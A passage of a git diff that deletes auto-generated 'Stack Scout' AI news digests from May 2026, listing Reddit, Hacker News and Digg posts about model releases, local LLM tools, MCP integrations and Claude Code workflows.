Graph)](https://reddit.com/r/ChatGPT/comments/1ther0u/glia_localfirst_shared_memory_layer_sqlitevec/) -*Reddit r/ChatGPT* | 19/05/2026 | Score: 0.86 -Tags: cli_tool, tool_update - -> Hey everyone, I wanted to share a project I've been working on called Glia. It is a 100% offline, local-first RAG and memory layer designed to connect your AI web chats (Claude, ChatGPT, DeepSeek) with your local developer tools (Claude Code, Cursor, Windsurf) using a unified local database. I wanted something lightweight that did not require pulling heavy Docker containers or subscribing to third-party memory APIs. I settled on a Node.js + SQLite architecture running sqlite-vec (for 768-dim float32 embeddings) alongside SQLite FTS5 for hybrid search, powered completely by local Ollama instances. We just launched a live website that outlines the details and demonstrates the features in action: * Website: [https://glia-ai.vercel.app/](https://glia-ai.vercel.app/) * Codebase: [https://github.com/Eshaan-Nair/Glia-AI](https://github.com/Eshaan-Nair/Glia-AI) Technical Stack & Features: * Hybrid Search Retrieval: SQLite-vec (using nomic-embed-text locally) + FTS5 keyword prefix matching (porter stemmer). * Surgical Sentence-level Trimming: Chunks are sliced into sentences. When a prompt is intercepted, only the exact matching sentences are pulled out of the vector store instead of t… - ---- - -## [Centralize SKILLs](https://reddit.com/r/ClaudeAI/comments/1thc7pg/centralize_skills/) -*Reddit r/ClaudeAI* | 19/05/2026 | Score: 0.86 -Tags: open_source, agent_tool - -> We recently tried to roll out an AI agent workflow across a 60-person company, and we found out 1. need to centralize the SKILLs files 2. update, versioning markdown file supporting multi users is a challenge Does Claude enterprise version offer any solution? or there are any open source project helping company to manage skills ? Since these are just text files, we could hack together a workaround using SharePoint to distribute them internally. But are there any actual purpose-built tools for this? - ---- - diff --git a/data/digest-2026-05-20.md b/data/digest-2026-05-20.md deleted file mode 100644 index 152b39f..0000000 --- a/data/digest-2026-05-20.md +++ /dev/null @@ -1,107 +0,0 @@ -# Stack Scout - AI News Digest -**2026-05-20** | 15 stories | Auto-generated from 630 archived stories - ---- - -## [Antigravity unifies its agentic surfaces under a single platform incorporating Antigravity 2.0 desktop app, CLI, SDK, and IDE for consistent access across environments](https://www.digg.com/ai/xizlma81) -*Digg AI* | Score: 1.00 -Tags: api_update, developer_tool, cli_tool - ---- - -## [Put your spare Claude cycles on night shift: help review open-source packages](https://reddit.com/r/ClaudeAI/comments/1tizbag/put_your_spare_claude_cycles_on_night_shift_help/) -*Reddit r/ClaudeAI* | 20/05/2026 | Score: 0.94 -Tags: open_source, developer_tool, cli_tool - -> Hello, I’m building Thirdpass, a tool/service for coordinating collaborative package review to reduce software supply-chain risk. The basic idea: there are far too many packages for humans to manually review, but lots of us now have AI coding agents sitting around with spare capacity. Thirdpass tries to turn that into useful coverage by assigning packages/files to review, collecting the results, and cross ref against local project dependencies. It currently supports packages from: - crates.io - PyPI - npm - Ansible Galaxy I added a “night shift” mode, so you can point Claude at the shared review backlog and let it work through package reviews continuously: ``` thirdpass review-any --nightshift ``` The reviews are first-pass supply-chain reviews: suspicious install scripts, unexpected network behavior, credential handling, sketchy build steps, weird package metadata, and so on. Partial coverage still helps. I’m looking for people who want to: - run the CLI and donate spare Claude tokens to secure OSS - improve the review prompts/agent workflow - build more registry extensions I started this project years ago after thinking a lot about `cargo-crev` and collaborative review. My curre… - ---- - -## [Re. what ever happened to Cohere’s Command-A series of models?](https://reddit.com/r/LocalLLaMA/comments/1tizmar/re_what_ever_happened_to_coheres_commanda_series/) -*Reddit r/LocalLLaMA* | 20/05/2026 | Score: 1.00 -Tags: open_source, tool_update - -> Hey everyone, Nick Frosst here from Cohere. A few months ago Aidan (my cofounder) [left a comment](https://www.reddit.com/r/LocalLLaMA/comments/1rf8nou/comment/o8rkdrf/) in here about our Command series and how we were working on some more powerful, open-weights models behind the scenes. We just launched Command A+ and we wanted to share it with you guys. TLDR is we built a really efficient model. It’s our first MoE model, which is exciting. There’s obvs work to do on top-line performance but it’s easily looking like one of the fastest and most responsive models in our category. We also pulled off some incredible quantization work so it runs really well on even 1 or 2 GPUs. Like with R7B, we really prioritized making the model practical, so smaller teams and devs could realistically use it to build the kind of agents we ship for our platform customers. That’s also why it’s under Apache 2.0. Just total, near unfettered access to a pretty awesome model. We’re enterprise-first but honestly, we get so much out of our open-source community that makes us more innovative and creative. The feedback you give will almost certainly influence how we think about models and product going forwar… - ---- - -## [Cohere releases Command A+, its most advanced large language model optimized to run efficiently on limited hardware while delivering high performance and available as open-source software — The launch targets developers and organizations with constrained compute resources.](https://www.digg.com/ai/tvrhpn35?rank=1) -*Digg AI* | Score: 1.00 -Tags: product_launch, open_source - ---- - -## [Cohere releases Command A+, its most advanced large language model optimized to run efficiently on limited hardware while delivering high performance and available as open-source software](https://www.digg.com/ai/tvrhpn35) -*Digg AI* | Score: 1.00 -Tags: product_launch, open_source - ---- - -## [Gemini 3.5 Flash Benchmarks Change The Workhorse Model Race](https://x.com/koraykv/status/2056795667088204234) -*Aligned News (Scoble)* | 20/05/2026 | Score: 1.00 -Tags: tool_update, agent_tool - -> Gemini 3.5 Flash launched with strong numbers on agentic, coding, ARC AGI, and speed focused benchmarks. - ---- - -## [Remove-AI-Watermarks – CLI and library for removing AI watermarks from images](https://github.com/wiltodelta/remove-ai-watermarks) -*Hacker News* | 19/05/2026 | Score: 0.88 -Tags: developer_tool, cli_tool - ---- - -## [Seven questions decide whether your AI agent ships. Most teams can answer two.](https://natesnewsletter.substack.com/p/agent-infrastructure-control-layer) -*Nate's Newsletter* | Score: 0.82 -Tags: tool_update, agent_tool - ---- - -## [open source Gemini CLI](https://github.com/google-gemini/gemini-cli) -*Simon Willison's Blog* | Score: 0.74 -Tags: open_source, cli_tool - ---- - -## [Antigravity SDK](https://github.com/google-antigravity/antigravity-sdk-python) -*Simon Willison's Blog* | Score: 0.74 -Tags: api_update, developer_tool - ---- - -## [After a year in Claude Code, the thing slowing me down turned out to be me](https://reddit.com/r/ClaudeAI/comments/1ti8cwr/after_a_year_in_claude_code_the_thing_slowing_me/) -*Reddit r/ClaudeAI* | 20/05/2026 | Score: 0.70 -Tags: mcp, cli_tool - -> I have used Claude Code daily for about a year. I kept assuming the way to get faster was a better model or a sharper prompt. It was neither. The slow part was me, and I had stopped noticing. There is an old xkcd (#1205, "Is It Worth the Time?") that charts how long you can spend automating a task before the automation costs more than it saves. It assumes the expensive part of automating is you, sitting down to build the thing. That assumption is dead. An agent writes the script in the time it takes to describe it. So almost everything is worth automating now, and the only real skill left is noticing what to automate. It sorted into four categories for me. Each one has a "tell," a thing you catch yourself doing: - Connect: you're copy-pasting between tools, alt-tabbing, ferrying data by hand. Fix is an MCP server or a CLI so the agent reaches the source itself. - Encode: you're running the same sequence of steps again. Fix is a script or a skill. - Teach: you're typing the same instructions or context again. Fix is putting it in CLAUDE.md or a skill. - Parallelize: you're sitting and watching one agent work. Fix is running several. The last one was the big one. When an agent is ge… - ---- - -## [Stability AI releases a new audio model that can create 6-minute songs](https://techcrunch.com/2026/05/20/stability-ai-release-a-new-audio-model-that-can-create-six-minute-songs/) -*TechCrunch AI* | Score: 1.00 -Tags: product_launch - ---- - -## [Exa raised $250 million in a Series C at a $2.2 billion valuation led by Andreessen Horowitz, reporting 400,000 developers and 5,000 company adopters for its AI agent search platform — Token usage grew 20x for agent-driven queries.](https://www.digg.com/ai/1te0bqvt?rank=2) -*Digg AI* | Score: 1.00 -Tags: agent_tool - ---- - -## [AI server under 5k?](https://reddit.com/r/LocalLLaMA/comments/1tirzfm/ai_server_under_5k/) -*Reddit r/LocalLLaMA* | 20/05/2026 | Score: 1.00 -Tags: developer_tool - -> I have a framework desktop 128GB and a 3080 12GB running qwen 7b I want to move to a proper server rack + switch but not sure how to move from desktop PC to server rack. Any advice on what GPU/Server to get under 5k? Or at that price just stick to workstation? - ---- - -## [under 2% quality gap but 10x cost difference: tested 5 models on identical tool calling tasks[D]](https://reddit.com/r/MachineLearning/comments/1tiqsao/under_2_quality_gap_but_10x_cost_difference/) -*Reddit r/MachineLearning* | 20/05/2026 | Score: 1.00 -Tags: mcp - -> I've been running a file management agent built on MCP for a few months. It handles module renames, import updates, validation scaffolding, test execution. A typical session is 60 to 120 tool calls. The whole thing was powered by Opus 4.7 because I never thought to question it until I looked at my April bill. So I set up a comparison. Eight refactoring tasks on a 15k line Python project, same MCP tools, same system prompt, same repo state, five models. Tasks were things like "rename this module and fix all imports" and "add input validation to these 12 endpoints." Routine cleanup, nothing requiring deep architectural thought. The metric I cared about was first attempt tool call success: did the model produce a valid function call that executed without a parse error on the first try? On the expensive end, Opus 4.7 hit roughly 98 to 99 percent across a bit over 500 calls and cost close to $15 for all eight tasks. GPT 5 was similar quality for around $11. The cheaper tier surprised me. Sonnet 4.6 landed somewhere around 96 percent for about $4. DeepSeek V4 Pro was in the same neighborhood for under $2. And Tencent Hunyuan Hy3 preview came in within a couple of points of Opus for unde… - ---- - diff --git a/data/digest-2026-05-21.md b/data/digest-2026-05-21.md deleted file mode 100644 index 5cdaf95..0000000 --- a/data/digest-2026-05-21.md +++ /dev/null @@ -1,119 +0,0 @@ -# Stack Scout - AI News Digest -**2026-05-21** | 15 stories | Auto-generated from 634 archived stories - ---- - -## [Anthropic officially launched 13+ FREE AI courses with certificates (Including Agentic AI and Claude Code!)](https://reddit.com/r/ClaudeAI/comments/1tjpfh8/anthropic_officially_launched_13_free_ai_courses/) -*Reddit r/ClaudeAI* | 21/05/2026 | Score: 1.00 -Tags: api_update, mcp, developer_tool, cli_tool, tool_update, agent_tool - -> Just found out about this and had to share because almost nobody is talking about it yet. If you are tired of paying for AI courses or getting hit with paywalls just to get a certificate, Anthropic (the creators of Claude) quietly dropped a massive library of completely free, official training modules. Yes, they actually give you an official certificate of completion directly from Anthropic once you finish. Here is the breakdown of what is available and exactly how to get it without spending a dime. What is in the course catalog? They have split the training into a few different paths depending on what you want to do: * **The Big Surprise: Agentic AI & MCP:** They have official courses on the Model Context Protocol (MCP). This is the cutting-edge tech used to build AI Agents that can browse your local computer, use tools, and execute tasks autonomously. * **Claude Code 101:** Dedicated developer modules for their new command-line agent. It teaches you how to let Claude edit your codebase, run tests, and use its new "Plan Mode." * **API & Cloud Architecture:** Deep dives into building with the Claude API, plus corporate tracks for deploying Claude securely inside Amazon Bed… - ---- - -## [Qwen releases Qwen3.7-Max, its latest flagship model for agent workloads that achieves 69.7 on Terminal-Bench 2.0 and completed a 35-hour kernel optimization with over 1,000 tool calls — Supports multi-file coding agents, MCP integrations, and multi-agent orchestration.](https://www.digg.com/ai/5rbia2h1?rank=4) -*Digg AI* | Score: 1.00 -Tags: mcp, product_launch, cli_tool - ---- - -## [I built a zero-code visual client to test remote MCP servers instantly (Tested with Cloudflare’s free MCP).](https://reddit.com/r/ClaudeAI/comments/1tjpzfg/i_built_a_zerocode_visual_client_to_test_remote/) -*Reddit r/ClaudeAI* | 21/05/2026 | Score: 1.00 -Tags: mcp, cli_tool, tool_update - -> Hey everyone, The Model Context Protocol (MCP) is amazing for standardizing how agents talk to data, but I got incredibly frustrated every time I wanted to quickly test a new remote MCP server. Writing custom client-side boilerplate or wrestling with CLI tools just to see if a tool actually exposes the right schema is a massive time sink. So, I built a native MCP client directly into the visual canvas of **AgentSwarms**. You can now test any remote MCP server entirely in the browser without writing a single line of code. **Here is the workflow I just tested with Cloudflare:** Cloudflare released a free MCP server for their documentation. Instead of building a local client to test it: 1. I dropped their SSE URL into the new MCP Servers integration in AgentSwarms. 2. The canvas immediately connected and extracted the available tools (e.g., `cloudflare-docs-search`). 3. I wired that tool up to a basic agent and started asking complex infrastructure questions in natural language. The agent successfully used the MCP tool to pull live docs and synthesize an answer. **Why this is useful for AI devs:** If you are building your own MCP servers, you need a fast way to visually test if your… - ---- - -## [I did what Microsoft wouldn't - updated POML VS Code extension](https://reddit.com/r/LocalLLaMA/comments/1tjine7/i_did_what_microsoft_wouldnt_updated_poml_vs_code/) -*Reddit r/LocalLLaMA* | 21/05/2026 | Score: 1.00 -Tags: api_update, developer_tool, tool_update - -> **What's a POML?** Microsoft came up with this really cool HTML style mark-up language that allows you to make modular prompt templates, with all sorts of neat features like **local AI support via OpenAI API**, setting runtime parameters for your LLM, and embedding documents into the prompt. You could even send the prompt directly to your LLM via the VS Code extension. **What happened to it?** I don't fucking know. They supported it for 2-3 months, then ghosted when it didn't hit KPIs or something, I guess. Then a VS Code or dependency update exposed a bug in how they handled `/>`, which is actually **fairly common** in POML when you embed documents. This broke the ability to directly send prompts to the LLM - you could copy them out of the preview, but it was slower and less efficient. **What I did** I used [OpenCode](https://opencode.ai/) (which doesn't get enough play here - I only found out about it because someone posted a repo for an **extension** to it) and the [opencode-power-pack](https://github.com/waybarrios/opencode-power-pack) (said extension) to try to find the bug and update some of the more egregiously outdated dependencies. It took me a couple of days to get wo… - ---- - -## [Show HN: Rmux – A programmable terminal multiplexer with a Playwright-style SDK](https://github.com/helvesec/rmux) -*Hacker News* | 21/05/2026 | Score: 0.82 -Tags: api_update, developer_tool, cli_tool - ---- - -## [I built Hivemind, a Claude Code plugin that turns your repeated prompts into auto-generated skills](https://reddit.com/r/ClaudeAI/comments/1tjw0ah/i_built_hivemind_a_claude_code_plugin_that_turns/) -*Reddit r/ClaudeAI* | 21/05/2026 | Score: 0.70 -Tags: api_update, open_source, developer_tool - -> Disclosure: I work on Hivemind. Per the subreddit rules, posting with a full description of what it is and how it works. **What it is** Hivemind is an open-source Claude Code plugin. It installs into Claude Code, watches the traces from your sessions, finds patterns you repeat, and crystallizes them into reusable skills that show up as native slash commands in Claude Code. Because it's a plugin and not an external tool, the skills it generates drop in as proper Claude Code slash commands. No external tool calls, no separate config files to maintain. **What it does in practice** Every morning for about a week, I was writing the same long prompt to Claude Code to pull together a team standup review. Same structure, same context blocks, slightly different details each day. I never thought to turn it into a custom slash command. Hivemind noticed the pattern and built `/team-standup` for me on its own. I didn't configure it or ask for it; it watched the repeats and crystallized the skill. Other slash commands it's built from my team's usage: an environment-aware database debugging command that knows our dev vs prod clusters and kubectl context, a PostHog SDK testing helper, a few other… - ---- - -## [LlamaStation v0.9 — llama.cpp GUI for Windows with multi-backend support, TurboQuant, MTP and more](https://reddit.com/r/LocalLLaMA/comments/1tjm58w/llamastation_v09_llamacpp_gui_for_windows_with/) -*Reddit r/LocalLLaMA* | 21/05/2026 | Score: 1.00 -Tags: product_launch, cli_tool - -> I've been building this for the past few months as a side project — started because I didn't want to run llama.cpp from the command line every time I wanted to try a model. I just wanted something that worked with a click. Fair warning: I'm not a developer. This is 100% vibe coded with AI assistance. If something in the codebase makes you cringe, please be kind and open a PR instead 🙏 Most frontends either hide everything behind abstractions (Ollama, LM Studio) or leave you writing command lines manually. LlamaStation tries to sit in the middle: a clean UI with full access to every parameter. What makes it different Runs llama-server directly — no intermediate layer, no daemon, no abstraction. LlamaStation launches llama-server.exe as a subprocess with full control over every flag. What you configure is exactly what gets passed to the binary. This means you get the full performance of llama.cpp with none of the overhead that tools like Ollama add on top. Multiple backends, switchable from the UI: ⚡ Official llama.cpp (with MTP support since PR #22673) 🔬 TurboQuant fork — asymmetric KV cache quantization. This is the killer feature for me: 200k+ context on 24GB VRAM (dual RTX 306… - ---- - -## ['Am I OpenAI compatible' - a tool and documentation for unified api signatures in open source AI.](https://reddit.com/r/LocalLLaMA/comments/1tjgceg/am_i_openai_compatible_a_tool_and_documentation/) -*Reddit r/LocalLLaMA* | 21/05/2026 | Score: 1.00 -Tags: api_update, open_source - -> This has turned out to be useful to many of my friends so I thought I'd share here as well. I created a tool and documentation page for most major open-souce project's adherence to 'OpenAI compatibility' after seeing inconsistencies between engines like vLLM and llama.cpp. Now official and unofficial signatures are documented. Beyond that there are gaps for many model types, so there's also ht-compatibility (inherited from OpenAI compatibility for those) Just wanted to share a tool I made that can be useful if you're plugging and playing llm and other ai endpoints e.g. into an app. Also if you're making your own proxy / middleware or even your own API interface this tool with make you and your agents job way easier. Maybe I'll add Anthropic compatible and other signatures as optional extensions :) Would love feedback and or contributions! Github: [https://github.com/heiervang-technologies/am-i-openai-compatible](https://github.com/heiervang-technologies/am-i-openai-compatible) Readthedocs: [https://heiervang-technologies.github.io/am-i-openai-compatible/](https://heiervang-technologies.github.io/am-i-openai-compatible/) Feel free to star it! <3 - ---- - -## [Cohere releases Command A+, its most powerful large language model to date, as open-source Apache 2.0 software that runs on two H100 GPUs with 30% lower latency — Cohere co-founder Ivan Zhang highlighted efficiency and accessibility design choices.](https://www.digg.com/ai/tvrhpn35?rank=2) -*Digg AI* | Score: 1.00 -Tags: product_launch, open_source - ---- - -## [ggufy: easy quantization for the GPU poor](https://reddit.com/r/StableDiffusion/comments/1tj5nhq/ggufy_easy_quantization_for_the_gpu_poor/) -*Reddit r/StableDiffusion* | 21/05/2026 | Score: 0.94 -Tags: product_launch, cli_tool - -> Hello. I was frustrated by the lack of tooling around image model conversion / quantization, or the extreme RAM requirements and complexity of the scant existing tooling, so I wrote my own. People have said I should post it here, so here it is: https://github.com/qskousen/ggufy It has a CLI and a GUI. The GUI is easy to use, you can drag and drop files in. Both CLI and GUI are single-file executables, written in Zig because I like writing in Zig. It's pretty efficient with RAM, and takes about 1.5 minutes to quantize ZiT on my machine. It supports all the main models that I am aware of, and you can convert to/from gguf or safetensors. It supports I think all the datatypes that are generally supported, such as q3_k through q8_0, f32, bf16, f16, f8_e4m3, f8_e5m2, scaled fp8, mxfp8, and nvfp4. It doesn't do SDNQ yet, but I would like to add it if I can get some time to figure out the format. It's cross platform, and builds for Linux, Windows, and MacOS (both ARM64 and x86). Github Actions pre-built binaries are available on the releases page. If there are features you think are in scope and would be useful, or additional models or formats that it doesn't support yet, please open an i… - ---- - -## [i open-sourced the operating file that keeps my claude code agent from rotting after 3 hours](https://reddit.com/r/ClaudeAI/comments/1tjy3sk/i_opensourced_the_operating_file_that_keeps_my/) -*Reddit r/ClaudeAI* | 21/05/2026 | Score: 0.62 -Tags: developer_tool, tool_update - -> been running autonomous claude code sessions for months. the pattern that kept killing me: agent starts sharp, drifts into narration by hour 2, loops on the same fix by hour 3, then dies with nothing shipped. the fix wasn't a framework or a new tool. it was one CLAUDE.md file that sits in the project root. claude code reads it at startup and it changes the behavior immediately. what it does: - forces action over narration. if the agent catches itself writing "i will now" instead of calling the tool, it stops and fires - requires evidence before claiming done. no "should be fixed" without test output - kills planning language. the only valid outputs are completed actions, questions, or summaries - self-audits on context pressure instead of silently degrading it's 70 lines. MIT licensed. you copy it into your project, agent reads it, behavior shifts. what changed for us: sessions went from 3-hour narration loops to full productive lifecycles. the agent ships code, verifies it landed, and keeps going until context pressure hits. then it saves state and the next session picks up clean. not a product pitch. genuinely sharing what worked after burning through hundreds of sessions figuri… - ---- - -## [Claude Code vs Codex Explained](https://reddit.com/r/ClaudeAI/comments/1tjp4sb/claude_code_vs_codex_explained/) -*Reddit r/ClaudeAI* | 21/05/2026 | Score: 0.62 -Tags: developer_tool, cli_tool - -> Wrote a blog post about Claude Code vs Codex comparison I wanted to read myself - what actually differs in daily use: cost, failure modes, and the OpenAI plugin that lets you use both. Link: [https://diamantai.substack.com/p/claude-code-vs-codex-cli](https://diamantai.substack.com/p/claude-code-vs-codex-cli) - ---- - -## [Latest b9274 Addresses MTP VRAM leak](https://reddit.com/r/LocalLLaMA/comments/1tk0grd/latest_b9274_addresses_mtp_vram_leak/) -*Reddit r/LocalLLaMA* | 21/05/2026 | Score: 1.00 -Tags: product_launch - -> [B9274](https://github.com/ggml-org/llama.cpp/releases) I have been having an issue with MTP models unloading after a couple minutes of use. Can't figure out why. Anyways z I don't think this is relevant to that but I did observe the vram creep so hopefully this helps. > server : free draft/MTP resources on sleep to fix VRAM leak ([\#23461](https://github.com/ggml-org/llama.cpp/pull/23461)) The destroy() function in server\_context\_impl only cleaned up the main model and context (via llama\_init.reset()) but did not free the speculative decoder (spec), draft context (ctx\_dft), or draft model (model\_dft). For MTP (Multi-Token Prediction) models, ctx\_dft holds GPU-allocated resources (KV cache, compute buffers) that are not freed when entering the sleeping state. On each sleep/resume cycle, new resources are allocated without the old ones being freed, leading to a VRAM leak that eventually crashes the server with out-of-memory errors. Fix by explicitly resetting spec, ctx\_dft, and model\_dft in destroy() before resetting llama\_init, ensuring proper cleanup order to avoid use-after-free. - ---- - -## [Handoffs are becoming a first-class pattern in Claude workflows. Here is how I have been thinking about them.](https://reddit.com/r/ClaudeAI/comments/1tjzqrx/handoffs_are_becoming_a_firstclass_pattern_in/) -*Reddit r/ClaudeAI* | 21/05/2026 | Score: 1.00 -Tags: developer_tool - -> Long Claude sessions still break on context decay. Handoffs are the simple fix: compress what matters, start a fresh agent, keep going. Matt Pocock's new `handoff` skill ([repo](https://github.com/mattpocock/skills/blob/main/skills/productivity/handoff/SKILL.md)) does this in one command. It compacts the conversation into a document, points at existing artifacts instead of restating them, and the next agent picks up from it. It also chains between threads: `/grill-with-docs -> /handoff -> /prototype -> /handoff back`. I built handoffs into [APM](https://github.com/sdi2200262/agentic-project-management), a multi-agent framework for Claude Code, back in May 2025 (1 year ago....) when context windows were tiny enough that you had to constantly start fresh or you would have to deal w hallucinations all the time. What I did differently: split the handoff into two artifacts. - a **persistent narrative file** recording what was done and decided and why - an **ephemeral prompt** telling the incoming agent how to rebuild context from the codebase and that persistent file The incoming agent reconstructs from durable project state, not just the compressed chat conversation. Persisti… - ---- - -## [Qwen3.6 35Ba3 has changed my workflows and even how I use my computer](https://reddit.com/r/LocalLLaMA/comments/1tjwrp7/qwen36_35ba3_has_changed_my_workflows_and_even/) -*Reddit r/LocalLLaMA* | 21/05/2026 | Score: 1.00 -Tags: developer_tool - -> My workflow has changed basically to ask Codex to do certain tasks and then document how to do them (including errors it found on its way) into a skill. I feed that skill to pi, and suddenly my qwen3.6 gets that hard stuff done: \- devops on a VPS \- using docling to create epubs from old PDFs \- using playwright to test stuff \- Doing code tickets And the list goes on. What also has changed for me is the way I use the computer. Suddenly, I talk to the OS with natural language: "pi pal, install me please this python library in an .env and do X"; "hey pi, check what is using most space from the memory"; "clean X"; "check my network"; "change X configuration", etc etc etc. There are times the only reason why I use chatgpt for something is to spare the laptop the effort, or because qwen is already busy with something else. What I've done today just blew my mind: I got couple of whatsapp audios asking me to build a simple landing page. I downloaded the audios and transcripted them with AnythingLLM. Then "asked the transcript" to create a content structure for the landing page for the project mentioned in the audios. I got the proper structure and pasted it into a markdown file [conten… - ---- - diff --git a/data/digest-2026-05-22.md b/data/digest-2026-05-22.md deleted file mode 100644 index d9c44b3..0000000 --- a/data/digest-2026-05-22.md +++ /dev/null @@ -1,117 +0,0 @@ -# Stack Scout - AI News Digest -**2026-05-22** | 15 stories | Auto-generated from 512 archived stories - ---- - -## [New Release of ROCm based MLX LLM Engine - lemon-mlx-engine](https://reddit.com/r/LocalLLaMA/comments/1tkbupt/new_release_of_rocm_based_mlx_llm_engine/) -*Reddit r/LocalLLaMA* | 22/05/2026 | Score: 1.00 -Tags: api_update, product_launch, developer_tool - -> Hey everyone lemon-mlx-engine just got done integrating TheRock / ROCm 7.13 into the lemon-mlx-engine which means you get to try the latest ROCm on your local hardware with the MLX engine! This also includes various bug fixes and kernel fixes we have been seeing in Qwen3, 3.5 and 3.6 MoE and dense. try it out! [https://github.com/lemonade-sdk/lemon-mlx-engine/releases/tag/b1034-stable](https://github.com/lemonade-sdk/lemon-mlx-engine/releases/tag/b1034-stable) - ---- - -## [Claude Chrome extension nerfed?](https://reddit.com/r/ClaudeAI/comments/1tk5g5y/claude_chrome_extension_nerfed/) -*Reddit r/ClaudeAI* | 22/05/2026 | Score: 0.86 -Tags: developer_tool, tool_update, agent_tool - -> Past few weeks or so the Claude Chrome extension has been asking permission for every single action. Submit a form, check a permission box, navigate to other pages/domains, etc. Tasks that used to run end-to-end now stall on 5–10 prompts and frequently abort with "I can't proceed without explicit approval." Even with permissions pre-granted for the site, it re-asks on every step. Swearing and yelling to make it do stuff helps a little, but it still seems nearly useless right now. Same behavior across simple jobs (scrape a table, fill a form, summarize a dashboard) and complex ones. Before I could just tell it to get me warranty or something and it would find the chat, chat with support and take care of everything for me. Now it won't open the chat itself and it wants me to notify it of every chat message that's received... it's faster to do it myself like this. Same experience on your end, or isolated? Any setting or flag that restores the previous autonomy level? Did Anthropic push a policy/guardrail change recently? Can't find a changelog entry. Workarounds beyond falling back to the desktop app or computer-use? Running latest extension build, Chrome stable, macOS. - ---- - -## [KVCache.ai launches open-source web-based KV Cache Size Calculator for models including DeepSeek V4 Flash, Qwen3, GLM, Kimi, and MiniMax — DeepSeek V4 Flash at 1M tokens needs 2.893 GiB total cache.](https://www.digg.com/ai/yuusdejg?rank=6) -*Digg AI* | Score: 1.00 -Tags: product_launch, open_source - ---- - -## [Phosphene 3.0 — open source AI video + image suite for Apple Silicon. Train your own LTX characters.](https://reddit.com/r/StableDiffusion/comments/1tkh9c2/phosphene_30_open_source_ai_video_image_suite_for/) -*Reddit r/StableDiffusion* | 22/05/2026 | Score: 1.00 -Tags: open_source, tool_update - -> Sharing Phosphene 3.0. It's a free panel that runs LTX-Video 2.3 and a couple of image models natively on Apple Silicon. Local, MIT license, no subs, no cloud. The thing that sets it apart from "yet another LTX wrapper": you can \*\***train your own characters**\*\* inside the panel. Drop 30 to 80 photos, click Train, get a face LoRA back. Add a voice clip and you get a voice LoRA too. Auto-captions with Gemma 3 12B locally. \~3 hours per character on an M4 Max 64 GB. \*\***What 3.0 ships**\*\* \- Text → video+audio (LTX-2 generates joint audio+video in one pass) \- Image → video+audio \- Audio → video (drive a clip with an audio reference) \- FFLF (first frame + last frame interpolation) \- Extend (continue an existing clip) \- Character training (face + optional voice LoRA, from a single dataset) \- Image Studio with three engines: Qwen-Image-Edit-2511, HiDream-O1, and the FLUX.1 family. Multi-reference composition up to 3 subjects. \*\***HiDream-O1 ported to MLX**\*\* HiDream released their O1 image model on May 14. Got it running natively on Apple Silicon five days later. Photoreal portraits, instruction edits, multi-subject. \~67 seconds per 1024² on a 64 GB Mac. \*\***Hardwa… - ---- - -## [Sam Altman makes 'mic drop' offer to every Y Combinator startup](https://reddit.com/r/ChatGPT/comments/1tkffxq/sam_altman_makes_mic_drop_offer_to_every_y/) -*Reddit r/ChatGPT* | 22/05/2026 | Score: 1.00 -Tags: api_update, open_source - -> just read this on techcrunch. OpenAI is putting $2M worth of API tokens into every company in the current YC batch (\~169 startups) via an uncapped SAFE that converts at their next priced round. roughly 2% equity if they hit a $100M valuation. YC takes 7% for $500k cash. this is on top of that, so founders aren't choosing between them. but the dynamic is wild. on one hand, infra bills are the #1 silent killer of AI startups right now. solving that with tokens instead of cash is genuinely useful. on the other hand, Jason Calacanis already came out swinging, basically saying OpenAI now has a window into 169 startups' exact usage patterns, prompts, and product directions. nothing stopping them from rolling the best ideas into ChatGPT itself a year later. we've already seen this movie with the GPT store. also there's the lock in. once your stack is OpenAI native and you've burned the tokens, switching to anthropic or open source models becomes way harder. you're basically buying into the ecosystem with your equity, not just your code. curious what people here think. would you take the deal if you were in YC right now? feels like one of those things that looks like free money but costs… - ---- - -## [Which MCP servers are actually changing your Claude workflow? Sharing mine](https://reddit.com/r/ClaudeAI/comments/1tkec4e/which_mcp_servers_are_actually_changing_your/) -*Reddit r/ClaudeAI* | 22/05/2026 | Score: 1.00 -Tags: api_update, mcp - -> Running Claude with MCP for a couple months now, it really does feel like a whole new product. The ability to run real tools (file system, API, database, etc.) connected to Claude, and never have to cut/paste from context again, is huge. I'm trying a bunch of servers, some are pretty good and some aren't. My current normal is: filesystem server for docs on my computer; GitHub server for PR context; and a handful of other domain specific ones I found. The one thing I keep thinking about is how much better Claude's output gets when you give it the proper context. It seems like less hallucinating, more on point answers. MCP is essentially an answer to "How do I provide Claude with enough information to help me without having to always watch the context box?" What are people running? Specifically looking for underrated or domain specific things that don't come up as often. - ---- - -## [Gmail tie-ins](https://reddit.com/r/LocalLLaMA/comments/1tk5of4/gmail_tieins/) -*Reddit r/LocalLLaMA* | 22/05/2026 | Score: 1.00 -Tags: api_update, developer_tool - -> hey folks. I’m looking to setup a way to give a local LLM access to google cloud SDK for Gmail functions. The goal is to be able to have an LLM once daily check a spreadsheet, and based on criteria send an email that will be structured exactly the same way each time, simply as a notification to the client. I have set up GWS through Hermes agent using Gwen3.5 and gone through the whole Oauth 2.0 method. That’s as far as I got tonight before shutting everything down. It gave me some error message in the setup after auth confirmation that I’ll circle back to tomorrow. I’m fairly new to all this obviously. I believe I will need: an excel file that the LLM with access, a .md file listing customer names and emails, and a skill .md file explaining what the email format is and how to decide who to send the email(s) to based on the excel file. I’ve never made a skill before but I’ll do more research on that tomorrow. Am I on the right track here or way off base? Thanks for any input or assistance here. - ---- - -## [Gergely Neu, an ML researcher at ICREA and Universitat Pompeu Fabra, introduces Value-Driven Transport, a generative modeling framework that integrates optimal control, reinforcement learning, optimal transport, and stochastic primal-dual optimization — Framework evolves samples across five stages via learned value functions.](https://www.digg.com/ai/hpkmhl2b?rank=7) -*Digg AI* | Score: 0.94 -Tags: product_launch, developer_tool - ---- - -## [I built a music notation app with Claude, and Claude is also a feature inside it](https://reddit.com/r/ClaudeAI/comments/1tkp3p4/i_built_a_music_notation_app_with_claude_and/) -*Reddit r/ClaudeAI* | 22/05/2026 | Score: 0.78 -Tags: open_source, developer_tool - -> I've been building Nubium, an open-source music notation editor, with Claude Code. Check out the [README](https://github.com/nth-chile/nubium) to see how I combined Github issues + Claude skills to find a workflow that worked for me. The app is document-driven, which makes it easy for its AI Chat plugin to use the app and edit the score for you. Aside from that, it's a fully-featured editor that's free, runs standalone or in browser, and requires no account. If you happen to be looking for a new notation editor, I'd love any feedback - I made it easy to send feedback in-app. Lmk what you think! Website: [https://nubium.rocks/](https://nubium.rocks/) Repo: [github.com/nth-chile/nubium](http://github.com/nth-chile/nubium) - ---- - -## [DeepSeek makes its 75% discount on the 